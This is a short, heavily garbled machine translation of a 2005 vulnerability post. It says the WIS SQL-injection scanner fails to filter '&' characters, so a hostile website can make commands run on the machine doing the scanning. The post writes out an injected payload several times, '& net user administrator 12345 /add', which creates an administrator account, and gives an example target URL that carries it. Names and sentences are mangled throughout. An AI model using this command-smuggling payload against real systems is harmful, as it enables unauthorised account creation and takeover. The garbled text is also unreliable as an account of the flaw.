Term: freexploit
Author: AlLeesno
Date: 2005-2-2wis is the SQL Vulnerability Scanning Tool of Xiaozu WIS to & Characters Not Stringent Filter Causes Artificial Creating & Characters Executing Arbitrary Code on Scanner Machines & Net User Allysno 12345 / Add is not Wis & Net User Allyesno 12345 / Add is when using WIS to scan a website
We can use WIS unfiltered & embed & Net User Administrator 12345 / Add & Net User Administrator 12345 / Add in ASP code, such as ASP code.
When WIS is scanned, the result is as follows.
http://www.target.com/sqlbug?=sql&net user administrator 12345 / add
Local Execute WIS & NET USER AllySno 12345 / Add is a certain amount of it can be performed by adding two instructions together.
